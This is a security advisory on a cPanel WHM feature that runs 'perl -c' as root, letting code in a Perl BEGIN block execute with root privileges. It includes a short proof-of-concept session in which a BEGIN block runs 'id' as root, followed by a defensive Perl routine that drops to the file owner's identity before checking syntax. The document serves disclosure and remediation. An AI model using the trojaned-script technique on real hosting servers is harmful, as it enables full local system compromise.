cPanel 11.24.7-BETA_34914 - /scripts/fixperlscript runs 'perl -c' as root, allowing for code execution via BEGIN blocks



DESCRIPTION


WHM contains a feature for the root user that checks the syntax of a specified Perl script to ensure there are no errors. It does this by passing the '-c' option to the perl binary. Any Perl code contained within BEGIN blocks is executed when perl -c is run. Because this feature failed to drop privileges, that code ran as root: a malicious individual could request their webhost to click the link in WHM to check their (trojaned) Perl script, completely compromising the local machine.



IMPACT


Full system compromise.


Running perl -c on code without a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
system("/usr/bin/id > /home/user/id.out");
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
cat: /home/user/id.out: No such file or directory


Running perl -c on code with a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
BEGIN { system("/usr/bin/id > /home/user/id.out"); }
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
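
One way to close the gap described above is to drop to the file owner's identity before invoking perl -c. The following is an added example, not cPanel's code or its actual fix; the helper name check_syntax_as_owner and the /usr/bin/perl path are assumptions.

```perl
#!/usr/bin/perl
# Added example, not cPanel's code. check_syntax_as_owner is a hypothetical name.
use strict;
use warnings;
use POSIX ();
use Fcntl qw(O_RDONLY O_NOFOLLOW);

sub check_syntax_as_owner {
    my ($path) = @_;

    # Open first and stat the open handle, so the ownership decision and the
    # code that gets compiled refer to the same file (no symlink or swap race).
    sysopen(my $fh, $path, O_RDONLY | O_NOFOLLOW) or die "open $path: $!\n";
    my @st = stat($fh) or die "stat $path: $!\n";
    die "$path: not a regular file\n" unless -f _;
    my ($uid, $gid) = @st[4, 5];
    die "$path: owned by root, refusing to compile it\n" if $uid == 0;

    my $pid = fork();
    die "fork: $!\n" unless defined $pid;
    if ($pid == 0) {
        # Child: the script arrives on stdin, root's environment is discarded.
        open(STDIN, '<&', $fh) or POSIX::_exit(126);
        %ENV = (PATH => '/usr/bin:/bin');
        # Order matters: groups first, then gid, then uid (irreversible).
        $) = "$gid $gid";
        POSIX::setgid($gid) or POSIX::_exit(126);
        POSIX::setuid($uid) or POSIX::_exit(126);
        # Fail closed if any root identity survived the drop.
        POSIX::_exit(126) if $< != $uid || $> != $uid;
        # With no program file, perl reads the program from stdin.
        exec { '/usr/bin/perl' } 'perl', '-c' or POSIX::_exit(127);
    }
    waitpid($pid, 0);
    return $? == 0;    # true only when perl reported "syntax OK"
}

# Usage: run as root with the path of a user-owned script.
if (!caller) {
    my $path = shift @ARGV or die "usage: $0 /path/to/script.pl\n";
    print check_syntax_as_owner($path) ? "OK\n" : "FAILED\n";
}
```

BEGIN blocks still execute during the check, but only with the privileges the script's owner already has. Because the script is read from stdin, code that depends on its own file name or location (for example a relative "use lib") may behave differently than when it is run from disk.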